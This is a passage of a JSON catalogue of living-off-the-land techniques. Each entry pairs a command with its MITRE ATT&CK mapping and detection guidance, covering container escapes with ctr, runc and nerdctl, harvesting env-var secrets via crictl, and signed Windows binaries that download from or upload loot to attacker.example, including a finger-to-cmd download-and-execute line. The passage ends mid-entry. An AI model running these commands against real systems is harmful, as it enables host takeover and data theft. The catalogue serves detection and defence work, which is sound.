installation","aliases":[]},{"id":"daemon:crictl:9","toolId":"daemon:crictl","toolName":"crictl","name":"Execute","source":"DAEMON","platform":["Linux"],"capability":["Execution"],"nativeCategory":["Execute","Container Administration"],"command":"crictl ps\ncrictl exec -it CONTAINERID sh","description":"crictl is the CRI debugging CLI that talks directly to the node's container runtime (containerd/CRI-O) socket, bypassing the API server and kubelet policy entirely. From a compromised node, crictl ps lists running containers and crictl exec drops an interactive shell into any of them, including other tenants' workloads.","usecase":"On a node, execute into any running container out-of-band of the Kubernetes API and its RBAC/audit.","mitre":["T1609"],"privilege":"admin","detection":[{"type":"Detection","value":"Node-level process/auditd monitoring: exec of crictl (and containerd-shim/runc exec children) not originating from kubelet. These actions bypass API audit, so rely on host EDR and file/socket access to /run/containerd/containerd.sock or /var/run/crio/crio.sock."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubernetes.io crictl debug docs and cri-tools confirm `crictl ps` and `crictl exec -it`; crictl speaks directly to the CRI socket, bypassing apiserver/RBAC/audit. Not a GTFOBins/LOLBAS binary; T1609.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:crictl:10","toolId":"daemon:crictl","toolName":"crictl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"crictl ps -a\ncrictl inspect CONTAINERID","description":"crictl inspect returns a container's full CRI status JSON including its environment variables, command line, mounts and labels. Applications commonly pass secrets (DB passwords, API keys, tokens) as env vars, so inspecting containers on a node reveals those plaintext values without touching Kubernetes Secret objects or the API server.","usecase":"Read plaintext env-var secrets and mount layout of colocated containers straight from the node runtime.","mitre":["T1552.007","T1613"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for crictl inspect / inspectp / inspecti invocations on nodes outside of sanctioned tooling, and for reads of the containerd/CRI-O socket. Prefer mounting secrets as files with restrictive modes over env vars to shrink this exposure."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1552/007/"],"added":true,"verifyNote":"cri-tools/crictl docs confirm `crictl inspect` returns container status JSON incl. env vars (and inspectp/inspecti variants exist); reading runtime-held env secrets fits T1552.007 (Container API) + T1613 discovery.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:ctr:11","toolId":"daemon:ctr","toolName":"ctr","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"ctr image pull {REMOTEURL}/ubuntu:latest\nctr run --privileged --net-host -t {REMOTEURL}/ubuntu:latest esc bash\nctr run --mount type=bind,src=/,dst=/host,options=rbind:rw -t {REMOTEURL}/ubuntu:latest esc chroot /host bash","description":"ctr is containerd's low-level admin client. With access to the containerd socket an operator can pull an image and launch a container with --privileged/--net-host, or bind-mount the node root (src=/) into the container; chroot /host then yields a root shell on the node. It bypasses the kube-apiserver and any admission control.","usecase":"Turn containerd socket access on a node into node root via a privileged or host-bind-mount container.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for ctr invocations carrying --privileged, --net-host, or --mount type=bind,src=/ , and for access to /run/containerd/containerd.sock by non-kubelet processes. New containerd tasks from unexpected images/registries on a node are high-signal."}],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks containerd-ctr page confirms the exact `ctr run --privileged --net-host` and `ctr run --mount type=bind,src=/,dst=/...` host-mount escapes; ctr is not a GTFOBins binary; T1611. (options=rbind:rw is a benign superset of the documented options=rbind.)","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:runc:12","toolId":"daemon:runc","toolName":"runc","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"runc spec\n# edit config.json mounts: {\"type\":\"bind\",\"source\":\"/\",\"destination\":\"/\",\"options\":[\"rbind\",\"rw\",\"rprivate\"]}\nmkdir rootfs\nrunc run esc","description":"runc is the OCI runtime under Docker/containerd/CRI-O. Where runc is available with root, an operator can generate an OCI bundle with runc spec, edit config.json to bind-mount the host root (source \"/\") into the container, and runc run it, producing a container whose filesystem is the node's, granting full host access outside any orchestration policy.","usecase":"Spawn an OCI container that bind-mounts the host root to reach node root when runc is runnable as root.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for runc spec and runc run invocations that are not children of containerd-shim/dockerd (i.e. manual bundles), and for config.json files whose mounts bind source \"/\". Flag new OCI bundle directories written to disk followed by runc run."}],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks runc page confirms `runc spec` -> edit config.json to bind-mount source '/' -> `runc run`; also confirms runc must run as root (privilege=admin). T1611; runc is not a GTFOBins binary.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:docker:13","toolId":"daemon:docker","toolName":"docker","name":"Collection","source":"DAEMON","platform":["Linux"],"capability":["Collection","File Read"],"nativeCategory":["Collection","Data Staging"],"command":"docker cp CONTAINERID:/etc/shadow /tmp/x\ndocker export CONTAINERID -o /tmp/x.tar\ndocker save IMAGE:latest -o /tmp/x.tar","description":"With Docker daemon access, docker cp pulls individual files out of any container's filesystem, docker export writes a tar snapshot of a container's whole filesystem, and docker save archives full images (all layers/history). Together they let an operator harvest other containers' files, embedded secrets and build-time credentials from a single node.","usecase":"Collect files, filesystem snapshots and image layers (with baked-in secrets) from colocated containers.","mitre":["T1005"],"privilege":"admin","detection":[{"type":"Detection","value":"docker events for export/save/cp actions and auditd for large tar writes by dockerd; flag export/save of containers or images the user did not create, and cp reads of sensitive paths (/etc/shadow, mounted secret volumes). Baseline legitimate backup jobs to reduce noise."}],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"added":true,"verifyNote":"docker export/save/cp CLI docs confirm the commands and -o/--output (export page fetched live). Criterion (e) caveat: `docker cp` overlaps the existing GTFOBins docker File-read/File-write functions, but `docker export`/`docker save` (whole-filesystem and whole-image tar for bulk collection, T1005) are additive and absent from GTFOBins — kept for that additive value.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:nerdctl:14","toolId":"daemon:nerdctl","toolName":"nerdctl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"nerdctl run --privileged --rm -it -v /:/host alpine chroot /host sh","description":"nerdctl is the Docker-compatible CLI for containerd and accepts docker run flags. On a node with containerd, an operator can run a --privileged container that bind-mounts the host root (-v /:/host) and chroot /host to obtain node root, the same host-mount escape as docker/ctr but through the nerdctl front-end.","usecase":"Escape to node root via containerd using familiar docker-style --privileged and host-mount flags.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for nerdctl invocations with --privileged or -v /:/ (host-root bind) and for new containerd tasks not launched by kubelet. Restrict access to the containerd socket and to the nerdctl binary; alert on chroot into a host-root mount inside a container."}],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"nerdctl command-reference confirms Docker-compatible `--privileged` and `-v` bind mounts; same host-mount escape as docker but nerdctl is NOT a GTFOBins/LOLBAS binary, so the entry is additive; T1611.","requires":[],"services":[],"environment":["Containers"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:msiexec:15","toolId":"daemon:msiexec","toolName":"msiexec.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute"],"command":"msiexec /q /i https://attacker.example/x.msi","description":"The signed Windows Installer fetches and silently installs a remote MSI; the package's custom actions run arbitrary code under the trusted msiexec host. A signed vendor MSI can also be paired with a malicious remote transform: msiexec /i C:\\Windows\\Temp\\x.msi TRANSFORMS=\"https://attacker.example/x.mst\" /qb.","usecase":"Proxy execution of attacker code through a trusted, signed installer, including from a remote URL.","mitre":["T1218.007","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"msiexec.exe with an http(s):// argument or a network-facing parent; msiexec.exe spawning cmd.exe/powershell.exe/rundll32; MSI or MST files written into INetCache; TRANSFORMS= pointing at a URL."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"added":true,"verifyNote":"LOLBAS Msiexec.yml quotes both `msiexec /q /i {REMOTEURL}` and `msiexec /i {PATH} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb`, MitreID T1218.007; verbatim match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:curl:16","toolId":"daemon:curl","toolName":"curl.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Download","File Upload"],"nativeCategory":["Download","Upload"],"command":"curl.exe -o C:\\Windows\\Temp\\x.exe http://attacker.example/x.exe\ncurl.exe -T C:\\Windows\\Temp\\loot.zip http://attacker.example/upload/","description":"curl.exe has shipped in-box on Windows 10 since build 1803 (and on macOS/Linux for years). -o/--output writes a downloaded URL to a chosen path (ingress transfer) and -T/--upload-file (or -d/--data for POST) exfiltrates a local file to a remote server, all from a Microsoft-signed binary.","usecase":"Download a payload or stage/exfiltrate data using a built-in, trusted HTTP client instead of certutil/bitsadmin.","mitre":["T1105","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"curl.exe writing executable/script content with -o/-O; curl.exe -T/--upload-file or -d to external hosts; curl.exe with a non-interactive parent (office, script host); egress to newly-seen domains from curl.exe."}],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"added":true,"verifyNote":"curl.se manpage documents -o/--output and -T/--upload-file (and -d/--data) exactly as described; curl.se/windows confirms the Microsoft-signed in-box build.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:tar:17","toolId":"daemon:tar","toolName":"tar.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","Hide/ADS"],"command":"tar.exe -xf \\\\10.10.10.10\\share\\x.tar -C C:\\Windows\\Temp\ntar.exe -cf C:\\Windows\\Temp\\x.txt:evil.tar C:\\Windows\\Temp\\payload","description":"The in-box bsdtar (Windows 10 1803+) extracts an archive directly from a UNC/SMB path, pulling files from a remote host without a classic downloader (ingress transfer). tar can also read from and write to NTFS Alternate Data Streams (path:ads), hiding archived payloads inside a benign-looking file.","usecase":"Copy files in from a remote share, or stash a payload in an ADS to evade file-based detection, using a signed archiver.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"tar.exe with a UNC (\\\\host\\share) source; tar.exe archive paths containing ':' (ADS notation); tar.exe making SMB/network connections; extraction into system-writable temp dirs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"added":true,"verifyNote":"LOLBAS Tar.yml documents `tar -xf {PATH_SMB:.tar}` (T1105) and `tar -cf {PATH}:ads {folder}` / `tar -xf {PATH}:ads` (T1564.004); both match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:ssh:18","toolId":"daemon:ssh","toolName":"ssh.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","Library Load"],"nativeCategory":["Execute"],"command":"ssh.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" .\nssh.exe -o PKCS11Provider=\"\\\\10.10.10.10\\Temp\\x.dll\" user@test.local","description":"The in-box OpenSSH client (Windows 10 1809+) runs the string given in ProxyCommand/LocalCommand through the shell before it ever connects, giving indirect command execution under a signed binary. The PKCS11Provider option loads and executes an attacker DLL (DllMain / C_GetFunctionList) from a remote SMB share.","usecase":"Proxy-execute a command or side-load a DLL from a signed, trusted SSH client for defense evasion.","mitre":["T1202","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"ssh.exe with ProxyCommand/LocalCommand/PKCS11Provider on the command line; ssh.exe spawning cmd.exe/powershell.exe; ssh.exe loading a non-standard DLL from a UNC path; ssh.exe run with no legitimate remote host."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Ssh.yml quotes `ssh -o ProxyCommand=\"{CMD}\" .` and `ssh -o PKCS11Provider=\"\\\\...\\example.dll\"` (DLL from SMB share), MitreID T1202; match. NOTE: secondary T1218 tag flagged in suspect — the PKCS11 DLL load maps better to T1574.002/T1129.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:scp:19","toolId":"daemon:scp","toolName":"scp.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","File Copy"],"nativeCategory":["Execute"],"command":"scp.exe -S C:\\Windows\\Temp\\x.exe . localhost:.\nscp.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" . localhost:.","description":"The in-box OpenSSH scp client spawns the program named by -S (alternate ssh program) or ProxyCommand even when no SSH server is listening, giving indirect command execution under a signed binary. scp also legitimately copies files to/from remote hosts and can be used to stage or exfiltrate data.","usecase":"Proxy-execute a command through scp->ssh, or move files off-host, using a signed binary.","mitre":["T1202","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"scp.exe with -S or -o ProxyCommand; scp.exe child processes (cmd/powershell); scp.exe copying to/from external hosts; scp targeting localhost with no SSH service present."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Scp.yml quotes both `scp.exe -S \"{CMD}\" . localhost:.` and `scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.` (spawns even with no SSH), MitreID T1202; match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:msedge:20","toolId":"daemon:msedge","toolName":"msedge.exe","name":"Download","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["File Download","Execution"],"nativeCategory":["Download","Execute"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"https://attacker.example/x.base64.html\" > C:\\Windows\\Temp\\x.b64\nmsedge.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Chromium browsers (Edge is preinstalled and signed; chrome.exe behaves identically) print the rendered DOM to stdout with --headless --dump-dom, letting an operator pull a base64 payload disguised as an .html page with no classic downloader on the command line. The --gpu-launcher switch runs an arbitrary command as a child of the signed browser (system binary proxy execution).","usecase":"Silently download a payload via a trusted browser, or proxy-execute a command under a signed browser process.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"browser process (msedge.exe/chrome.exe) with --headless together with --dump-dom, or with --gpu-launcher/--utility-cmd-prefix/--renderer-cmd-prefix; browser redirecting stdout to a file; browser process whose parent is a script host or Office app."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"added":true,"verifyNote":"LOLBAS Msedge.yml (OSBinaries) documents `--headless --enable-logging --disable-gpu --dump-dom` (T1105) and `--disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` (T1218.015); reference URL corrected to the OSBinaries YAML path.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:mpcmdrun:21","toolId":"daemon:mpcmdrun","toolName":"MpCmdRun.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","ADS"],"command":"MpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe\nMpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe:evil.exe","description":"Microsoft Defender's command-line utility (MpCmdRun.exe) downloads an arbitrary URL to disk with -DownloadFile (slashes or dashes both work), and can drop the file straight into an NTFS Alternate Data Stream. It is a signed AV binary, so the transfer blends in. Microsoft removed the flag in newer builds, but older platform copies remain abusable.","usecase":"Download a payload (optionally hidden in an ADS) using the trusted Defender binary itself.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"MpCmdRun.exe with -DownloadFile/-url/-path; MpCmdRun.exe launched from a non-Defender directory or by an unexpected parent; network egress from MpCmdRun.exe to non-Microsoft hosts; -path containing ':' (ADS)."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"added":true,"verifyNote":"LOLBAS MpCmdRun.yml quotes `-DownloadFile -url {REMOTEURL:.exe} -path {PATH:.exe}` (T1105, slashes/dashes both work) and the `-path {PATH}:evil.exe` ADS variant (T1564.004); match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:desktopimgdownldr:22","toolId":"daemon:desktopimgdownldr","toolName":"desktopimgdownldr.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://attacker.example/x.exe /eventName:desktopimgdownldr","description":"The Personalization CSP lock-screen tool downloads the URL given in /lockscreenurl to disk as a standard user. Overriding the SYSTEMROOT environment variable redirects the output to an attacker-chosen folder, and the PersonalizationCSP registry value seeded by the run can be deleted afterward to erase the trace.","usecase":"Download an arbitrary file with a native, signed Windows tool that is not certutil/bitsadmin.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"desktopimgdownldr.exe with /lockscreenurl to a non-Microsoft host or fetching a non-image; SYSTEMROOT environment override before the run; writes/deletes at HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"added":true,"verifyNote":"LOLBAS Desktopimgdownldr.yml quotes `set \"SYSTEMROOT=...\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL}` (T1105); SentinelOne write-up is the original research source.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:appinstaller:23","toolId":"daemon:appinstaller","toolName":"AppInstaller.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source=https://attacker.example/x.msix","description":"The ms-appinstaller:// URI is handled by the signed App Installer (AppInstaller.exe), which reaches out to the source URL, attempts to load/install the package, and caches the fetched file in INetCache. The download rides a trusted protocol handler with no obvious downloader on the command line; the same handler underpinned real-world MotW-bypass delivery campaigns.","usecase":"Download a remote file/package through a trusted URI handler rather than an explicit HTTP client.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"AppInstaller.exe making outbound connections to non-Microsoft hosts; ms-appinstaller:// URI invocations (e.g. via explorer/start); files appearing in INetCache attributed to AppInstaller.exe; MSIX/APPX pulled from untrusted domains."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS AppInstaller.yml quotes `start ms-appinstaller://?source={REMOTEURL:.exe}` and notes the file is 'saved in INetCache' (T1105); match. ms-appinstaller MotW-bypass abuse is publicly documented (Microsoft disabled the handler in 2023).","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:onedrivestandaloneupdater:24","toolId":"daemon:onedrivestandaloneupdater","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"reg add \"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\" /v UpdateRingSettingURLFromOC /t REG_SZ /d https://attacker.example/x /f && OneDriveStandaloneUpdater.exe","description":"The signed OneDrive updater downloads from the URL stored in the user-writable registry value HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC. Setting that value and launching the updater fetches an attacker-controlled file while the process command line stays completely benign.","usecase":"Download a file from the internet with a signed updater and no anomalous command-line arguments.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"writes to HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC; OneDriveStandaloneUpdater.exe connecting to hosts outside the official OneDrive/Office update CDNs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS OneDriveStandaloneUpdater.yml documents downloading from the URL in HKCU\\...\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC (T1105); match (LOLBAS also notes ODSUUpdateXMLUrlFromOC/UpdateXMLUrlFromOC must be non-empty).","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:finger:25","toolId":"daemon:finger","toolName":"finger.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Execution"],"nativeCategory":["Download"],"command":"finger user@attacker.example | more +2 | cmd","description":"The built-in Finger client retrieves data from a remote Finger (TCP/79) server; piping the server's response through more and into cmd turns the response into executed commands, giving a combined download-and-execute (and C2) channel over an unusual port with a signed binary.","usecase":"Retrieve and run attacker-supplied commands/payload over the rarely-monitored finger protocol.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"finger.exe making outbound TCP/79 connections to external hosts; finger.exe piped into cmd.exe/powershell.exe/more; any use of finger.exe at all, which is rare in modern environments."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS Finger.yml quotes `finger user@example.host.com | more +2 | cmd` verbatim (T1105, Download); exact match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:wsl:26","toolId":"daemon:wsl","toolName":"wsl.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux"],"capability":["Execution","File Download"],"nativeCategory":["Execute","Download"],"command":"wsl.exe --exec bash -c \"id > /mnt/c/Windows/Temp/x\"\nwsl.exe --exec bash -c 'cat < /dev/tcp/10.10.10.10/54 > /tmp/x'","description":"wsl.exe (signed, present where WSL is installed) runs arbitrary Linux commands via --exec/-e (as root with -u root, no password), giving indirect command execution under a trusted binary. bash's /dev/tcp pulls files with no external tool. wsl.exe also resolves its install path from HKLM\\...\\Lxss\\MSI\\InstallLocation, so a planted wsl.exe there is executed instead of the legitimate one.","usecase":"Execute payloads on the Linux side (evading Windows EDR), transfer files via /dev/tcp, or masquerade a payload as WSL.","mitre":["T1202","T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"wsl.exe with -e/--exec/-u root; wsl.exe/bash.exe spawning children outside System32; changes to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation; /dev/tcp usage inside WSL bash."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Wsl.yml documents `wsl.exe --exec bash -c \"{CMD}\"` (T1202), `wsl.exe --exec bash -c 'cat < /dev/tcp/.../.. > binary'` (T1105), and the HKLM\\...\\Lxss\\MSI\\InstallLocation lookup; match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:winget:27","toolId":"daemon:winget","toolName":"winget.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute","AWL Bypass"],"command":"winget.exe install --manifest C:\\Windows\\Temp\\x.yml\nwinget.exe install --accept-package-agreements -s msstore {StoreID}","description":"The Windows Package Manager installs from a local manifest (--manifest) whose Installer URL points at an arbitrary file that is then downloaded and executed, or installs a Microsoft Store package by ID even when the Store app is blocked and AppLocker is active. Either path fetches and runs code through a signed installer, bypassing application-control policy.","usecase":"Download-and-execute an arbitrary installer, or pull software from the Store, past AppLocker/Store restrictions.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"winget.exe install --manifest referencing a local/temp .yml; winget pulling installers from non-standard hosts; msstore installs where the Store app is policy-blocked; winget-spawned installer processes writing to unusual locations."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"added":true,"verifyNote":"LOLBAS Winget.yml quotes `winget.exe install --manifest {PATH:.yml}` (download+execute, T1105) and `winget.exe install --accept-package-agreements -s msstore {name/ID}` (AWL Bypass, installs even if Store app blocked); match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:devtunnel:28","toolId":"daemon:devtunnel","toolName":"devtunnel.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Upload","File Download"],"nativeCategory":["Download","Upload","Exfiltration"],"command":"devtunnel.exe host -p 8080","description":"The Microsoft Dev Tunnels agent (signed) exposes a local port/service on a Microsoft-hosted public *.devtunnels.ms URL. This creates an ingress/egress channel that can be used to reach internal services, stage tooling, or exfiltrate data, with the traffic riding trusted Microsoft tunneling infrastructure.","usecase":"Establish a trusted-domain tunnel for data transfer, exfiltration, or exposing an internal service to the internet.","mitre":["T1105","T1572","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"devtunnel.exe execution and persistent connections to *.devtunnels.ms / global.rel.tunnels.api.visualstudio.com; internal services becoming reachable via a Microsoft tunnel domain; unexpected long-lived outbound sessions from devtunnel.exe."}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"added":true,"verifyNote":"Microsoft Learn CLI reference documents `devtunnel host -p 3000` exposing a local port at a public *.devtunnels.ms URL; LOLBAS entry exists at OtherMSBinaries/devtunnels/ (reference URL corrected from the 404ing raw-YAML path to the working LOLBAS site page + MS Learn).","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:teams:29","toolId":"daemon:teams","toolName":"Teams.exe","name":"Execute","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execute"],"command":"Teams.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Classic Microsoft Teams is an Electron/Chromium app, and the Chromium --gpu-launcher switch runs an arbitrary command as a child of the signed Teams binary (system binary proxy execution / parent masquerading). The same abuse applies to other Electron apps, and Teams can also be made to run planted JavaScript from its app.asar/package.json.","usecase":"Proxy-execute a command under a trusted, signed Electron binary to blend with normal process trees.","mitre":["T1218.015"],"privilege":"user","detection":[{"type":"Detection","value":"Teams.exe (or any Electron app) launched with --gpu-launcher/--disable-gpu-sandbox/--utility-cmd-prefix; Teams.exe spawning cmd.exe/powershell.exe; unexpected writes to app.asar or package.json under %LOCALAPPDATA%\\Microsoft\\Teams."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"added":true,"verifyNote":"LOLBAS Teams.yml quotes `teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` and the app.asar/package.json JavaScript variants, all MitreID T1218.015 (Electron Applications); match.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"daemon:diskshadow:30","toolId":"daemon:diskshadow","toolName":"diskshadow.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","Credential Access"],"nativeCategory":["Execute","Dump"],"command":"diskshadow.exe /s C:\\Windows\\Temp\\x.txt","description":"diskshadow's script mode (/s) runs each line of a text script; an exec line spawns a child process under a signed binary (indirect execution), while its VSS commands (set/create/expose) snapshot a volume so locked files like NTDS.dit or the SAM/SYSTEM hives can be copied out of the shadow copy. One signed tool covers both proxy execution and credential-store theft.","usecase":"Proxy-execute a command and/or snapshot the volume to copy NTDS.dit and registry hives for offline credential 